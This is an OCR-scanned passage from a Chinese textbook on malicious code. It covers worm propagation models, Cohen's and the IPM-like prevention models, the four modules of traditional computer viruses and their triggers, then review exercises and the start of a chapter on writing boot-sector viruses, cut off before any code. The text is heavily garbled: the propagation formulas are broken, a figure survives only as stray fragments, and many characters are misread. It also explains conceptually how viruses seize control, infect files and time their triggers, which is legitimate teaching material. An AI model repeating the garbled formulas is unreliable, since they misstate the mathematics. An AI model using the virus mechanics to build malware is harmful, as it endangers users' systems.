的 计算 机 构成 的 完全 链接 网 络 ,考虑 蠕虫 在 这 个 网 络 中 传播 , 当 蠕 虫 从 网 络 中 的 一 个 节点 向 
外 传播 时 ,采用 如 下 传播 规则 。 

(1) 随机 选 出 zz 个 节点 进行 感染 ,每 个 节点 被 感染 的 概率 为 p。 

(2) 被 蠕虫 感染 的 所 有 节点 重复 此 过 程 , 直 到 感染 网 络 中 的 全 部 节点 。 

其 中 ,pocN(cc 代 表 “ 与 …… 成 正比 ”) ,在 仿真 中 , 设 p 二 FN(p 三 1), 这 里 下 为 概率 因 
子 , 通 过 调整 下 的 大 小 ,可 以 调整 仿真 程序 中 蠕虫 传播 的 速度 ,对 于 实际 的 Internet, 有 下 一 
1/2”, 即 感染 概率 为 加 一 N/22 。 


2.5 恶意 代码 预防 理论 模型 


自 20 世纪 90 年 代 以 来 ,国内 外 有 关 学 者 提出 了 许多 防范 计算 机 病毒 和 恶意 代码 的 理 
论 模 型 。 本 节 就 Fred Cohen 及 K.Jones 等 人 提出 的 有 关 模 型 作 简要 介绍 。 
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1. F. Cohen 提出 的 “四 模型 "理论 

(1) 基本 隔离 模型 。 该 模型 的 主要 思想 是 取消 信息 共享 ,将 系统 隔离 开 来 ,使 得 恶意 代 
码 既 不 能 从 外 部 人 侵 进 来 ,也 不 能 把 系统 内 部 的 恶意 代码 扩散 出 去 

当今 的 杀毒 软件 基本 都 支持 隔离 功能 ,就 是 这 一 理论 的 具体 实现 。 

(2) 分 隔 模 型 。 将 用 户 群 分 割 为 不 能 互相 传递 信息 的 若干 封闭 子 集 。 由 于 信息 处 理 流 
的 控制 ,使 得 这 些 子 集 可 被 看 作 是 系统 被 分 割 成 的 相互 独立 的 子 系统 ,使 得 恶意 代码 只 能 感 
染 整 个 系统 中 的 某 个 子 系统 ,而 不 会 在 子 系统 之 间 进 行 相互 传播 。 

应 用 虚拟 子 网 划分 等 技术 实现 网 络 安全 可 以 实现 分 隔 模 型 。 

(3) 流 模 型 。 对 共享 的 信息 流通 过 的 距离 设 定 一 个 靖 值 ,使 得 一 定量 的 信息 处 理 只 能 
在 一 定 的 区 域内 流动 , 若 该 信息 的 使 用 超过 设 定 的 值 , 则 可 能 存在 某 种 危险 。 

中 国 市 场 上 曾经 流行 的 隔离 网 闻 可 以 说 是 对 这 一 模型 的 最 好 践 行 。 

(4) 限制 解释 模型 。 即 限制 兼容 ,采用 固定 的 解释 模式 ,就 有 可 能 不 被 恶意 代码 感染 。 

尽管 IBM 曾经 提出 过 “让 每 台 计 算 机 都 拥有 不 同 的 操作 系统 ”的 想法 ,但 该 模型 到 现在 
还 没有 被 很 好 地 利用 。 微 软 公司 在 Vista 和 Windows 7 中 通过 限制 HOOK 技术 来 达到 对 
部 分 恶意 代码 的 防范 ,就 部 分 地 使 用 了 该 模型 的 理论 。 在 防范 恶意 代码 实践 中 ,通过 禁用 
Windows 操作 系统 的 WSH(Windows Scripting Host) 服 务 来 限制 脚本 病毒 的 执行 ,也 是 这 
种 防范 原理 的 重要 体现 。 

2. 类 IPM 模型 

农业 上 的 IPM(JIntegrated Pest Management) 模 型 实质 上 是 一 种 综合 管理 方法 。 它 的 

基本 思想 是 一 个 害虫 管理 系统 是 与 周 玮 环境 和 害虫 种 类 的 动态 变化 有 关 的 。 它 以 尽 可 能 温 
和 的 方式 利用 所 有 适用 技术 和 措施 治理 害虫 ,使 它们 的 种 类 维持 在 不 足以 引起 经 济 损失 的 
水 玉 之 下 

可 以 用 农作物 的 病虫害 与 恶意 代码 进行 下 述 类 比 。 

对 农作物 的 害虫 而 言 : 它们 “寄生 ”在 健康 的 “有 机 体 * 上 ,并 且 “ 掠 夺 ” 农 作物 资源 ; 通 
过 有 机 体 间 的 联系 而 侵害 其 他 有 机 体 ; 存在 它们 出 没 的 “痕迹 ”; 通过 伪装 隐藏 自身 ; 由 传 
染 机 制 和 破坏 机 制 所 构成 ,对 农作物 产生 危害 。 于 是 ,可 以 把 计算 机 程序 或 磁盘 文件 类 比 为 
不 断 生长 变化 的 植物 ; 把 计算 机 系统 比 作 一 个 由 许多 植物 组 成 的 田园 ; 把 恶意 代码 看 成 是 
侵害 植物 的 害虫 ; 把 计算 机 信息 系统 周围 的 环境 看 作 农业 事务 处 理 机 构 。 

因此 ,对 恶意 代码 的 遏制 就 可 以 借用 农业 科学 管理 中 已 经 取得 的 成 就 ,如 IPM 模型 。 
虽然 两 者 之 间 存 在 很 大 差别 ,但 它们 都 是 为 了 解决 系统 被 侵害 问题 ,因此 其 防治 策略 和 方法 
类 似 。 

以 上 介绍 的 几 种 防治 恶意 代码 的 理论 模型 虽然 带 有 历史 的 局 限 性 和 应 用 上 的 不 可 能 性 
(例如 ,基本 隔离 模型 "中 的 “取消 信息 共享 ”, 就 与 自 计算 机 面世 以 来 几 代 人 梦 究 以 求 并 为 
之 不 懈 奋斗 而 实现 的 伟大 目标 之 一 一 一 信息 共享 这 一 应 用 计算 机 的 主要 目的 背道而驰 ,这 
在 现实 中 是 不 可 能 做 到 的 ) ,但 是 这 些 理论 模型 对 于 当前 恶意 代码 的 宏观 防治 仍然 具有 有 益 
的 启示 作用 。 

(1) F.Cohen 的 “四 模型 说。 这 种 理论 的 实质 是 限制 控制 权限 和 相对 地 隔离 用 户 , 尽 
管 要 使 用 的 系统 共享 与 恶意 代码 防护 共存 在 现实 中 是 不 可 能 的 ,但 却 启示 人 们 可 以 通过 综 
合 权衡 、 综 合 治理 来 防治 恶意 代码 。 

(2) K. Jones 和 E. White 的 类 “IPM 模型 ?说 的 启示 。 
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中 “寻找 害虫 生命 周期 中 的 薄弱 环节 并 进行 针对 性 控制 ”。 根 据 恶 意 代 码 的 含义 ,知道 
恶意 代码 会 侵害 磁盘 文件 ,也 能 扩散 和 驻 留 在 存储 介质 上 。 因 此 ,恶意 代码 必定 存在 “ 写 操 
作 ”, 即 恶意 代码 生命 周期 中 的 薄弱 环节 就 是 “ 写 操作 ”。 由 于 恶意 代码 一 定 会 向 可 执行 文件 
进行 “ 写 操作 ”或 把 自身 复制 到 存储 介质 或 依附 于 宿主 程序 中 ,因此 遏制 恶意 代码 扩散 的 关 
键 是 防止 “ 写 操作 ”, 识 别 文件 或 程序 是 否 已 经 包含 了 恶意 代码 的 特征 码 等 。 

@ 设计 并 监控 防范 措施 ,使 之 能 适应 各 种 变化 。 一 成 不 变 的 管理 防范 手段 不 足以 彻底 
地 遏制 恶意 代码 的 攻击 。 

@ 不 能 仅仅 针对 那些 具有 和 较 高 价值 的 文件 采取 防范 恶意 代码 的 措施 ,而 应 始终 如 一 地 
对 整个 系统 进行 安全 防护 。 

@ 越 是 根据 文件 价值 的 大 小 而 采取 不 同 的 安全 措施 ,恶意 代码 的 平均 种 类 就 越 会 增多 。 

@ 遏制 恶意 代码 的 核心 是 人 或 管理 上 的 问题 ,而 不 是 技术 上 的 问题 。 


2.6 传统 计算 机 病毒 的 结构 和 工作 机 制 


传统 计算 机 病毒 (以 下 简称 计算 机 病毒 ) 一 般 由 感染 模块 触发 模块 .破坏 模块 (表现 模 
块 ) 和 引导 模块 ( 主 控 模 块 ) 四 大 部 分 组 成 。 根 据 是 否 被 加 载 到 内 存 ,计算 机 病毒 又 分 为 静态 
病毒 和 动态 病毒 。 处 于 静态 的 病毒 存 于 存储 介质 中 ,一般 不 能 执行 感染 和 破坏 功能 ,其 传播 
只 能 借助 第 三 方 活动 (如 复制 .下载 和 邮件 传输 等 ) 实 现 。 当 病毒 经 过 引导 功能 而 进入 内 存 
后 , 便 处 于 活动 状态 (动态 ) ,满足 一 定 触发 条 件 后 就 开始 进行 传染 和 破坏 ,从 而 构成 对 计算 
机 系统 和 资源 的 威胁 和 毁坏 。 传 统计 算 机 病毒 的 工作 流程 如 图 2-6 所 示 。 计 算 机 静态 病毒 
通过 第 一 次 非 授 权 加 载 ,其 引导 模块 被 执行 , 转 为 动态 病毒 。 动 态 病毒 通过 某 种 触发 手段 不 
断 检查 是 否 满足 条 件 ,一旦 满足 则 执行 感染 和 破坏 功能 。 病 毒 的 破坏 力 取 决 于 破坏 模块 ,有 
些 病 毒 只 是 干扰 显示 、 占 用 系统 资源 或 发 出 怪 音 等 ,而 男 一 些 恶 性 病毒 不 仅 表 现 出 上 述 外 观 
特性 ,还 会 破坏 数据 甚至 摧毁 系统 。 


e oomo0 癌 


病毒 破坏 触发 模块 


i 
满足 
本 Wi 和 E> (一 病 才 感 如 ] 《一 


不 满足 不 满足 


携 毒 潜伏 或 消散 携 毒 潜伏 或 消散 


2-6 传统 计算 机 病毒 的 工作 流程 示意 图 
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2.6.1 引导 模块 


传统 计算 机 病毒 实际 上 是 一 种 特殊 的 程序 ,该 程序 必然 要 存储 在 某 一 种 介质 上 。 为 了 
进行 自身 的 主动 传播 ,病毒 程序 必须 寄生 在 可 以 获取 执行 权 的 寄生 对 象 上 。 就 目前 出 现 的 
各 种 计算 机 病毒 来 看 ,其 寄生 对 象 有 两 种 : 寄生 在 磁盘 引导 扇 区 和 寄生 在 特定 文件 (EXE 
和 COM 等 可 执行 文件 ,DOC 和 HTML 等 非 执行 文件 ) 中 。 由 于 不 论 是 磁盘 引导 扇 区 还 是 
寄生 文件 ,都 有 获取 执行 权 的 可 能 ,寄生 在 它们 上 面 的 病毒 程序 就 可 以 在 一 定 条 件 下 获得 执 
行 权 ,从 而 得 以 进入 计算 机 系统 ,并 处 于 激活 状态 ,然后 进行 动态 传播 和 破坏 活动 。 

计算 机 病毒 的 寄生 方式 有 两 种 : 采用 替代 法 或 采用 链接 法 。 所 谓 蔡 代 法 ,是 指 病毒 程 
序 用 自己 的 部 分 或 全 部 指令 代码 ,替代 磁盘 引导 扇 区 或 文件 中 的 全 部 或 部 分 内 容 。 链 接 法 
则 是 指 病毒 程序 将 自身 代码 作为 正常 程序 的 一 部 分 与 原 有 正常 程序 链接 在 一 起 ,病毒 链接 
的 位 置 可 能 在 正常 程序 的 首部 .尾部 或 中 间 ,寄生 在 磁盘 引导 扇 区 的 病毒 一 般 采 取 替 代 法 ， 
而 寄生 在 可 执行 文件 中 的 病毒 一 般 采用 链接 法 。 

计算 机 病毒 寄生 的 目的 就 是 找 机 会 执行 引导 模块 ,从 而 使 自己 处 于 活动 状态 。 计 算 机 
病毒 的 引导 过 程 一 般 包括 以 下 三 方面 。 

1， 驻 留 在 内 存 中 

病毒 若 要 发 挥 其 破坏 作用 ,一 般 要 驻 留 在 内 存 中 。 为 此 就 必须 开辟 所 用 内 存 空间 或 覆 
盖 系 统 占用 的 部 分 内 存 空间 。 其 实 , 有 相当 多 的 病毒 根本 就 不 用 驻 留 在 内 存 中 。 

2. 窃取 系统 控制 权 

在 病毒 程序 驻 留 在 内 存 后 ,必须 使 有 关 部 分 取代 或 扩充 系统 的 原 有 功能 ,并 窃取 系统 的 
控制 权 。 此 后 病毒 程序 依据 其 设计 思想 ,隐蔽 自己 ,等待 时 机 ,在 条 件 成 熟 时 ,再 进行 传染 和 
破坏 。 

3. 恢复 系统 功能 

病毒 为 隐蔽 自己 , 驻 留 在 内 存 后 还 要 恢复 系统 ,使 系统 不 会 死机 ,只 有 这 样 才能 等 待 时 
机 成 熟 后 ,进行 感染 和 破坏 。 有 的 病毒 在 加 载 之 前 执行 动态 反 跟踪 和 病毒 体 解密 功能 。 

对 于 寄生 在 磁盘 引导 扇 区 中 的 病毒 来 说 ,病毒 引导 程序 占有 了 原 系统 引导 程序 的 位 置 ， 
并 把 原 系统 引导 程序 搬移 到 一 个 特定 的 地 方 。 这 样 系统 一 启动 ,病毒 引导 模块 就 会 自动 地 
装 入 内 存 并 获得 执行 权 , 然 后 该 引导 程序 负责 将 病毒 程序 的 传染 模块 和 发 作 模 块 装 入 内 存 
的 适当 位 置 , 并 采取 常 驻 内 存 技术 以 保证 这 两 个 模块 不 会 被 覆盖 ,接着 对 这 两 个 模块 设 定 某 
种 激活 方式 ,使 之 在 适当 的 时 候 获 得 执行 权 。 完 成 这 些 工作 后 ,病毒 引导 模块 将 系统 引导 模 
块 装 和 内存, 使 系统 在 带 病毒 状态 下 依然 可 以 继续 运行 。 

对 于 寄生 在 文件 中 的 病毒 来 说 ,病毒 程序 一 般 通过 修改 原 有 文件 ,使 对 该 文件 的 操作 转 
和 人 病毒 程序 引导 模块 ,引导 模块 也 完成 把 病毒 程序 的 其 他 两 个 模块 驻 留 在 内 存 及 初始 化 的 
工作 ,然后 把 执行 权 交 给 源 文件 ,使 系统 及 文件 在 带 病毒 的 状态 下 继续 运行 。 


2.6.2 感染 模块 


感染 是 指 计算 机 病毒 由 一 个 载体 传播 到 另 一 个 载体 ,由 一 个 系统 进入 另 一 个 系统 的 过 
程 。 这 种 载体 一 般 为 磁盘 或 磁带 , 它 是 计算 机 病毒 赖 以 生存 和 进行 传染 的 媒介 。 但 是 ,只 有 
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载体 还 不 足以 使 病毒 得 到 传播 。 促 成 病毒 的 传染 还 有 一 个 先决 条 件 , 可 分 为 两 种 情况 ,或 者 
称 为 两 种 方式 。 其 中 一 种 情况 是 用 户 在 复制 磁盘 或 文件 时 ,把 一 个 病毒 由 一 个 载体 复制 到 
另 一 个 载体 上 ,或 者 是 通过 网 络 上 的 信息 传递 ,把 一 个 病毒 程序 从 一 方 传递 到 另 一 方 。 这 种 
传染 方式 称 为 计算 机 病毒 的 被 动 传染 。 另 外 一 种 情况 是 以 计算 机 系统 的 运行 以 及 病毒 程序 
处 于 激活 状态 为 先决 条 件 。 在 病毒 处 于 激活 的 状态 下 ,只 要 传染 条 件 满足 ,病毒 程序 能 主动 
地 把 病毒 自身 传染 给 另 一 个 载体 或 另 一 个 系统 。 这 种 传染 方式 称 为 计算 机 病毒 的 主动 
传染 。 

1. 计算 机 病毒 的 传染 过 程 

对 于 病毒 的 被 动 传染 而 言 , 其 传染 过 程 是 随 着 复制 或 网 络 传 输 工 作 的 进行 而 进行 的 。 
对 于 计算 机 病毒 的 主动 传染 而 言 ,其 传染 过 程 为 : 在 系统 运行 时 ,病毒 通过 病毒 载体 即 系统 
的 外 存储 器 进入 系统 的 内 存储 器 ,然后 , 常 驻 内 存 并 在 系统 内 存 中 监视 系统 的 运行 ,从 而 可 
以 在 一 定 条 件 下 采用 多 种 手段 进行 传染 。 

计算 机 病毒 的 传染 方式 基本 可 分 为 两 大 类 ,一 类 是 立即 传染 , 即 病 毒 在 被 执行 的 瞬间 ， 
抢 在 宿主 程序 开始 执行 前 感染 磁盘 上 的 其 他 程序 ,然后 再 执行 宿主 程序 。 另 一 类 是 驻 留 在 
内 存 并 伺机 传染 ,内 存 中 的 病毒 检查 当前 系统 环境 ,在 执行 一 个 程序 、 浏 览 一 个 网 页 时 传染 
磁盘 上 的 程序 。 驻 留 在 系统 内 存 中 的 病毒 程序 在 宿主 程序 运行 结束 后 , 仍 可 活动 ,直至 关闭 
计算 机 。 

2. 计算 机 病毒 的 传染 机 制 

当 执 行 或 使 用 被 感染 的 文件 时 ,病毒 就 会 加 载 到 内 存 。 一 旦 被 加 载 到 内 存 , 计 算 机 病毒 
便 开 始 监 视 系 统 的 运行 , 当 它 发 现 被 传染 的 目标 时 ,进行 如 下 操作 。 

(1) 根据 病毒 自己 的 特定 标识 来 判断 文件 是 否 已 感染 了 该 病毒 。 

(2) 当 条 件 满足 时 ,将 病毒 链接 到 文件 的 特定 部 位 ,并 存 人 磁盘 中 。 

(3) 完成 传染 后 ,继续 监视 系统 的 运行 ,试图 寻找 新 的 攻击 目标 。 

文件 型 病毒 通过 与 磁盘 文件 有 关 的 操作 进行 传染 ,主要 传染 途径 如 下 。 

(1) 加 载 执行 文件 。 加 载 传染 方式 每 次 传染 一 个 文件 , 即 用 户 准 备 运 行 的 那个 文件 , 传 
染 不 到 用 户 没有 使 用 的 那些 文件 。 

(2) 浏览 目录 过 程 。 在 用 户 浏览 目录 的 时 候 , 病 毒 检查 每 一 个 文件 的 扩展 名 ,如 果 是 适 
合 感染 的 文件 ,就 调用 病毒 的 感染 模块 进行 传染 。 这 样 病毒 可 以 一 次 传染 硬盘 一 个 目录 下 
的 全 部 目标 。DOS 下 通过 DIR 命令 进行 传染 , Windows 下 利用 Explorer. exe 文件 进行 
传染 。 

(3) 创建 文件 过 程 。 创 建文 件 是 操作 系统 的 一 项 基本 操作 ,功能 是 在 磁盘 上 建立 一 个 
新 文件 。Word 宏 病 毒 就 是 典型 的 利用 创建 文件 过 程 进行 感染 的 恶意 代码 。 这 种 传染 方式 
更 为 隐蔽 狭 独 ,因为 新 文件 的 大 小 用 户 无 法 预料 。 


2.6.3 破坏 模块 


破坏 模块 在 设计 原则 、 工 作 原 理 上 与 感染 模块 基本 相同 。 在 触发 条 件 满足 的 情况 下 , 病 
毒 对 系统 或 磁盘 上 的 文件 进行 破坏 活动 .这 种 破坏 活动 不 一 定 都 是 删除 磁盘 文件 ,有 的 可 能 
是 显示 一 串 无 用 的 提示 信息 : 有 的 病毒 在 发 作 时 ,会 干扰 系统 或 用 户 的 正常 工作 ; 有 的 病 
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毒 一 旦 发 作 , 会 造成 系统 死机 或 删除 磁盘 文件 ; 有 的 病毒 发 作 还 会 造成 网 络 的 拥塞 甚至 
瘫痪 。 

传统 计算 机 病毒 的 破坏 行为 体现 了 病毒 的 杀伤 力 。 病 毒 破坏 行为 的 激烈 程度 取决 于 病 
毒 作者 的 主观 愿望 和 他 所 具有 的 技术 能 量 。 数 以 万 计 、 不 断 发 展 扩张 的 病毒 ,其 破坏 行为 千 
奇 百 怪 , 难 以 做 全 面 的 描述 。 病 毒 破坏 目标 和 攻击 部 位 主要 有 系统 数据 区 文件 内存、 系统 
运行 速度 .磁盘 `CMOS .主板 和 网 络 等 。 

但 是 ,在 利益 的 驱使 下 ,2005 年 以 后 的 恶意 代码 的 破坏 行为 已 经 越 来 越 隐秘 。 新 型 恶 
意 代 码 的 破坏 不 再 是 破坏 系统 、 删 除 文件 .堵塞 网 络 等 ,而 是 悄悄 地 窃取 用 户 机 器 上 的 信息 
(账号 .口令 .重要 数据 .重要 文件 等 ) ,甚至 当 信息 窃取 成 功 后 恶意 代码 会 悄悄 地 自我 销毁 ， 
消失 得 无 影 无 踪 。 


2.6.4 触发 模块 


感染 ,潜伏 、 可 触发 和 破坏 是 病毒 的 基本 特性 。 感 染 使 病毒 得 以 传播 ,破坏 性 体现 了 病 
毒 的 杀伤 能 力 。 大 范围 的 感染 行为 .频繁 的 破坏 行为 可 能 给 用 户 以 重创 ,但 是 ,如 果 它 们 总 
是 使 系统 或 多 或 少 地 出 现 异常 , 则 很 容易 暴露 。 而 不 破坏 、 不 感染 又 会 使 病毒 失去 其 特性 。 
可 和 触发 性 是 病毒 的 攻击 性 和 潜伏 性 之 间 的 调整 杠杆 ,可 以 控制 病毒 感染 和 破坏 的 频 度 ,兼顾 
杀伤 力 和 潜伏 性 。 

过 于 苛刻 的 触发 条 件 ,可 能 使 病毒 有 好 的 潜伏 性 ,但 不 易 传 播 。 而 过 于 宽松 的 触发 条 件 
将 导致 病毒 频繁 感染 与 破坏 ,容易 暴露 ,导致 用 户 做 反 病 毒 处 理 , 也 不 会 有 大 的 杀伤 力 。 

计算 机 病毒 在 传染 和 发 作 之 前 ,往往 要 判断 某 些 特定 条 件 是 否 满足 ,满足 则 传染 或 发 
作 , 和 否则 不 传染 或 不 发 作 或 只 传染 不 发 作 , 这 个 条 件 就 是 计算 机 病毒 的 触发 条 件 。 实 际 上 病 
毒 采用 的 触发 条 件 花样 繁多 ,从 中 可 以 看 出 病毒 作者 对 系统 的 了 解 程度 及 其 丰富 的 想象 力 
和 创造 力 。 目 前 病毒 采用 的 触发 条 件 主要 有 以 下 几 种 。 

(1) 日 期 触发 。 许 多 病毒 采用 日 期 作为 触发 条 件 。 日 期 触发 大 体 包 括 特定 日 期 触发 、 
月 份 触发 和 前 半年 /后 半年 触发 等 。 

(2) 时 间 触 发 。 时 间 触 发 包括 特定 的 时 间 和 触发 . 染 毒 后 累计 工作 时 间 和 触发 和 文件 最 后 
写 人 时 间 和 触发 等 。 

(3) 键盘 触发 。 有 些 病毒 监视 用 户 的 按键 动作 , 当 发 现 病毒 预定 的 按键 时 ,病毒 被 激 
活 , 进 行 某 些 特定 操作 。 键 盘 触 发 包括 按键 次 数 触发 .组 合 键 触发 和 热 启动 触发 等 。 

(4) 感染 触发 。 许 多 病毒 的 感染 需要 某 些 条 件 触 发 .而 且 相 当 数 量 的 病毒 以 与 感染 有 
关 的 信息 反 过 来 作为 破坏 行为 的 触发 条 件 , 称 为 感染 触发 。 它 包括 运行 感染 文件 个 数 触 发 、 
感染 序数 触发 .感染 磁盘 数 触发 和 感染 失败 触发 等 。 

(5) 启动 触发 。 病 毒 对 计算 机 的 启动 次 数 计 数 , 并 将 此 值 作 为 触发 条 件 。 

(6) 访问 磁盘 次 数 触发 。 病 毒 对 磁盘 I/O 访问 的 次 数 进行 计数 ,以 预定 次 数 作为 触发 
条 件 。 

(7) CPU 型 号 /主板 型 号 触发 。 病 毒 能 识别 运行 环境 的 CPU 型 号 /主板 型 号 ,以 预定 
CPU 型 号 /主板 型 号 作为 触发 条 件 , 这 种 病毒 的 触发 方式 奇特 罕见 。 

被 计算 机 病毒 使 用 的 触发 条 件 是 多 种 多 样 的 ,而 且 往 往 不 只 是 使 用 上 面 所 述 的 某 一 个 
条 件 ,而 是 使 用 由 多 个 条 件 组 合 起 来 的 触发 条 件 。 大 多 数 病毒 的 组 合 触 发 条 件 是 基于 时 间 ， 
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再 辅 以 读 写 盘 操作 (按键 操作 ) 以 及 其 他 条 件 。 例 如 ,“ 侵 略 者 ”病毒 的 激发 时 间 是 开机 后 系 
统 运 行 时 间 和 病毒 传染 个 数 成 某 个 比例 时 ,恰好 按 Ctrl 十 Alt 十 Del 组 合 键 试图 重新 启动 系 
统 , 则 病毒 发 作 。 

病毒 中 有 关 触 发 机 制 的 编码 是 其 敏感 部 分 。 剖 析 病 毒 时 ,如 果 搞 清 了 病毒 的 触发 机 制 ， 
可 以 修改 此 部 分 代码 ,使 病毒 失效 ,这 样 就 可 以 产生 没有 潜伏 性 的 病毒 样本 , 供 反 病 毒 研究 
者 使 用 。 


多 玉河 题 

一 、 填空 题 

1. 当前 ,人 们 用 的 PC、 笔 记 本 电脑 等 符合 模型 。 

2. 关于 恶意 代码 的 预防 理论 体系 ,F. Cohen 提出 了 
和 4 个 预防 理论 模型 。 

3. 从 制作 结构 上 分 析 , 传统 计算 机 病毒 一 般 包 括 
和 四 大 功能 模型 。 

4. 传统 计算 机 病毒 的 引导 模块 可 以 使 病毒 从 寄生 的 静态 状态 转换 到 执行 的 动态 状态 ， 
在 这 个 转换 过 程 中 ,引导 模块 主要 做 s 和 工作 。 

5. 基于 模型 设计 的 计算 机 是 不 可 能 被 传统 计算 机 病毒 感染 的 。 

二 、 选择 题 


1. 世界 上 第 一 台 计 算 机 ENIAC 是 ( ) 模 型 。 
A. 随机 访问 计算 机 
B. 图 灵机 
C. 随机 访问 存储 程序 计算 机 
D. 带 后 台 存 储 器 的 随机 访问 存储 程序 计算 机 
2. 某 个 种 群 在 没有 外 来 侵扰 时 ,其 种 群 数量 服从 ( We 


A. 图 灵机 B. 迭代 函数 C. 高 斯 分 布 D. 微分 系统 
3. 传统 计算 机 病毒 一 般 由 ( je )( )( ) 四 大 部 分 组 成 。 

A. 感染 模块 B. 触发 模块 C. 破坏 模块 D. 引导 模块 

E. 执行 模块 
4. 传统 计算 机 病毒 生命 周期 中 ,存在 ( ) 和 ( ) 两 种 状态 。 

A. 静态 B. 潜伏 态 C. 发 作 态 D. 动态 
三 、 思 考题 


1. 讨论 互联 网 蠕虫 传播 的 3 种 数学 模型 的 特点 。 

2. 给 定 一 个 十 六 进 制 序列 “0A 0B 01 02”, 计 算 其 在 任意 一 个 十 六 进 制 可 执行 文件 中 出 
现 的 概率 。 

3. 传统 计算 机 病毒 包含 四 大 功能 模块 ,并 且 在 系统 中 病毒 表现 为 静态 和 动态 两 个 状 
态 ,请 叙述 四 大 功能 模块 之 间 的 关系 ,以 及 状态 的 转换 过 程 。 
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传统 型 计算 机 病毒 是 最 原始 的 几 类 计算 机 病毒 ,主要 包括 感染 引导 区 的 病毒 ,感染 可 执 
行程 序 的 病毒 和 感染 数据 文件 的 病毒 。 除 了 本 章 讲解 的 几 个 计算 机 病毒 外 ,感染 Linux 系 
统 可 执行 程序 的 病毒 也 是 传统 计算 机 病毒 的 一 类 代表 。 基 于 章节 安排 的 考虑 ,Linux 系统 
下 感染 可 执行 文件 的 病毒 放 在 本 书 第 4 章 介 绍 。 

DOS 环境 下 的 病毒 数量 已 经 定格 在 了 5000 多 种 。DOS 平台 是 病毒 编制 者 (VXer) 的 
乐园 ,因为 程序 员 可 以 在 该 平台 下 自由 地 读 、 写 .控制 系统 的 所 有 资源 。Windows 平台 的 出 
现 促使 计算 机 病毒 技术 迅速 向 新 平台 转化 , Windows 9x( 包 括 Windows 95/98/Me) 平 台 
的 病毒 曾经 繁荣 一 时 ,虽然 Windows 9x 通过 使 用 设备 驱动 和 32 位 程序 来 管理 文件 系统 ， 
给 病毒 编制 带 来 了 一 定 的 麻烦 ,但 是 VXer 们 还 是 分 别 利用 Ring3 和 Ring0 执行 权限 达到 
了 目的 。 以 NT 内 核 为 基础 的 Windows 2000/NT/2003/XP 等 操作 系统 ,进一步 改进 了 系 
统 的 安全 性 ,此 时 ,虽然 利用 Ring3 执行 权限 的 病毒 可 以 轻松 转 到 新 平台 上 来 ,但 是 进入 
Ring0 难度 进一步 加 大 。 随 着 Windows Vista、Windows 7 等 的 安全 性 进一步 提高 ,利用 
Ring0 执行 权限 的 新 病毒 越 来 越 难 写 , 写 传统 型 计算 机 病毒 简直 到 了 不 可 能 的 地 步 。 

伴随 着 操作 系统 的 不 断 进步 ,可 执行 文件 的 格式 也 发 生 了 巨大 变化 。 它 包括 4 个 阶段 : 
DOS 中 以 COM 为 扩展 名 的 可 执行 文件 和 以 EXE 为 扩展 名 的 MZ 格式 的 可 执行 文件 ; 
Windows 3. x 下 出 现 的 NE(New Executable) 格 式 的 EXE 和 DLL 文件 ; Windows 3. x 和 
Windows 9x 所 专 有 的 LE(Linear Executable, 其 专用 于 VxD 文件 ); Windows 9x 和 
Windows NT/2000/XP 下 的 32 位 的 PE(Portable Executable) 格 式 文件 。 总 之 ,COM、MZ 
和 NE 属于 16 位 文件 格式 ,PE 属于 Win32 文件 格式 ,LE 可 以 兼容 16 位 和 32 位 两 种 环境 。 

当 编 制 计算 机 病毒 的 先驱 者 们 痴迷 于 他 们 高 超 的 汇编 语言 技术 和 成 果 时 ,可 能 不 会 想 
到 后 继 者 能 以 更 加 简单 的 手法 制造 影响 力 更 大 的 病毒 。 宏 病毒 是 感染 数据 文件 的 病毒 的 典 
型 代表 ,其 中 ,Microsoft Word 宏 病 毒 又 是 宏 病 毒 家 族 中 最 具有 代表 性 的 一 类 。 像 其 他 类 
型 的 病毒 一 样 , 宏 病 毒 也 经 历 了 从 产生 到 发 展 ,再 到 衰退 的 过 程 。 曾 经 , 宏 病 毒 感染 了 世界 
上 几乎 所 有 的 Windows 计算 机 , 占 了 当时 恶意 代码 总 量 的 50%。 

本 章 主要 介绍 DOS、Windows 平台 下 引导 区 病毒 、 可 执行 文件 病毒 、 感 染 数据 文件 的 宏 
病毒 等 传统 型 计算 机 病毒 ,并 设计 了 多 个 实验 来 展示 这 些 病毒 。 

本 章 学 习 目 标 

(1) 了 解 COM、EXE、NE.PE 可 执行 文件 格式 。 

(2) 了 解 引导 型 病毒 的 原理 及 实验 。 

(3) 掌握 COM 文件 型 病毒 的 原理 及 实验 。 

(4) 掌握 PE 文件 型 病毒 及 实验 。 

(5) 掌握 宏 病 毒 的 原理 及 实验 。 
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3.1 引导 型 病毒 编制 技术 


学 习 本 节 前 建议 先 学 习 硬 盘 主 引导 区 结构 .掌握 主 引导 程序 以 及 DOS 操作 系统 的 中 断 
知识 。 


3.1.1 引导 型 病毒 编制 原理 


20 世纪 90 年 代 中 期 之 前 ,引导 型 病毒 一 直 是 最 流行 的 病毒 类 型 。 直 到 2010 年 3 月 由 
金山 安全 反 病 毒 专家 发 现 了 Windows 系统 下 引导 型 病毒 “ 鬼 影 ", 这 彻底 颠覆 了 人 们 的 传统 
认识 一 一 Windows 下 不 会 再 有 引导 型 病毒 。 

引导 型 病毒 首先 感染 软盘 的 引导 区 ,然后 再 蔓延 至 硬盘 并 感染 硬盘 的 主 引导 记录 
(Main Boot Record,MBR)。 一旦 MBR 被 病毒 感染 ,病毒 就 试图 感染 软驱 中 的 软盘 引导 
区 。 引 导 区 病毒 是 这 样 工作 的 : 由 于 病毒 隐藏 在 软盘 的 第 一 扇 区 ,使 它 可 以 在 系统 文件 装 
入 内 存 之 前 ,先进 入 内 存 , 从 而 获得 对 操作 系统 的 完全 控制 ,这 就 使 它 得 以 传播 并 造成 危害 。 
引导 型 病毒 常常 用 自身 的 程序 替代 MBR 中 的 程序 ,并 移动 扇 区 到 硬盘 的 其 他 存储 区 。 由 
于 PC 开机 后 ,将 先 执行 主 引 导 区 的 代码 ,因此 病毒 可 以 获得 第 一 控制 权 , 在 引导 操作 系统 
之 前 ,完成 以 下 工作 。 

(1) 减少 系统 可 用 最 大 内 存量 ,以 供 自己 需要 。 

(2) 修改 必要 的 中 断 向 量 , 以 便 传播 。 

(3) 读 和 人 病毒 的 其 他 部 分 ,进行 病毒 的 拼装 。 病 毒 首先 从 已 标记 簇 的 某 扇 区 读 入 病毒 
的 其 他 部 分 ,这 些 簇 往往 被 标记 为 坏 簇 (但 是 文件 型 病毒 则 不 必 如 此 ,二 者 混合 型 也 不 必 如 
此 )。 然 后 ,再 读 人 原 引导 记录 到 0000: 7C00H 处 , 跳 转 执行 。 引导 型 病毒 的 代码 如 下 。 
